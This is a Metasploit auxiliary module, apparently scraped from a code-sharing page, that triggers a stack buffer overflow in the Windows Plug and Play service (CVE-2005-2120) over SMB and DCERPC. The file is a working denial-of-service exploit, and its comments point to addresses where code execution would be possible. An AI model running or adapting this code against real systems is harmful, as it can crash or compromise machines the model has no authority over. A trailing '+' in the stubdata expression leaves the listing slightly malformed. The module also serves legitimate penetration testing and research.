Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::DCERPC
8
  include Msf::Exploit::Remote::SMB::Client
9
  include Msf::Auxiliary::Dos
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Microsoft Plug and Play Service Registry Overflow',
14
      'Description'    => %q{
15
          This module triggers a stack buffer overflow in the Windows Plug
16
        and Play service. This vulnerability can be exploited on
17
        Windows 2000 without a valid user account. Since the PnP
18
        service runs inside the service.exe process, this module
19
        will result in a forced reboot on Windows 2000. Obtaining
20
        code execution is possible if user-controlled memory can
21
        be placed at 0x00000030, 0x0030005C, or 0x005C005C.
22
      },
23
      'Author'         => [ 'hdm' ],
24
      'License'        => MSF_LICENSE,
25
      'References'     =>
26
        [
27
          [ 'CVE', '2005-2120' ],
28
          [ 'MSB', 'MS05-047' ],
29
          [ 'BID', '15065' ],
30
          [ 'OSVDB', '18830' ]
31
        ]
32
      ))
33

34
    register_options(
35
      [
36
        OptString.new('SMBPIPE', [ true,  "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']),
37
      ])
38
  end
39

40
=begin
41

42
/* Function 0x0a at 0x767a54a8 */
43
long function_0a (
44
  [in] [unique] [string] wchar_t * arg_00,
45
  [out] [size_is(*arg_02)] [length_is(*arg_02)] wchar_t * arg_01,
46
  [in,out] long * arg_02,
47
  [in] long arg_03
48
);
49

50
=end
51

52
  def run
53

54
    # Determine which pipe to use
55
    pipe = datastore['SMBPIPE']
56

57
    print_status("Connecting to the SMB service...")
58
    connect()
59
    smb_login()
60

61

62
    # Results of testing on Windows 2000 SP0
63
    #  324 / 325 exception handled
64
    #  326 write to 0
65
    #  327 jump to 00000030
66
    #  328 jump to 0030005C
67
    #  329 jump to 005C005C
68

69
    # Completely smash the process stack
70
    i = 1024
71

72
    handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{pipe}"])
73
    print_status("Binding to #{handle} ...")
74
    dcerpc_bind(handle)
75
    print_status("Bound to #{handle} ...")
76

77
    path = "HTREE\\ROOT" + ("\\" * i)
78

79
    # 0 = nil, 1 = enum, 2/3 = services, 4 = enum (currentcontrolset|caps)
80

81
    stubdata =
82
      NDR.long(rand(0xffffffff)) +
83
      NDR.wstring(path) +
84
      NDR.long(4) +
85
      NDR.long(1) +
86

87
    print_status("Calling the vulnerable function...")
88

89
    begin
90
      dcerpc.call(0x0a, stubdata)
91
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
92
      print_good('Server did not respond, this is expected')
93
    rescue ::Errno::ECONNRESET
94
      print_good('Connection reset by peer (possible success)')
95
    rescue => e
96
      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
97
        print_good('Server disconnected, this is expected')
98
      else
99
        raise e
100
      end
101
    end
102

103
    disconnect
104
  end
105
end
106

107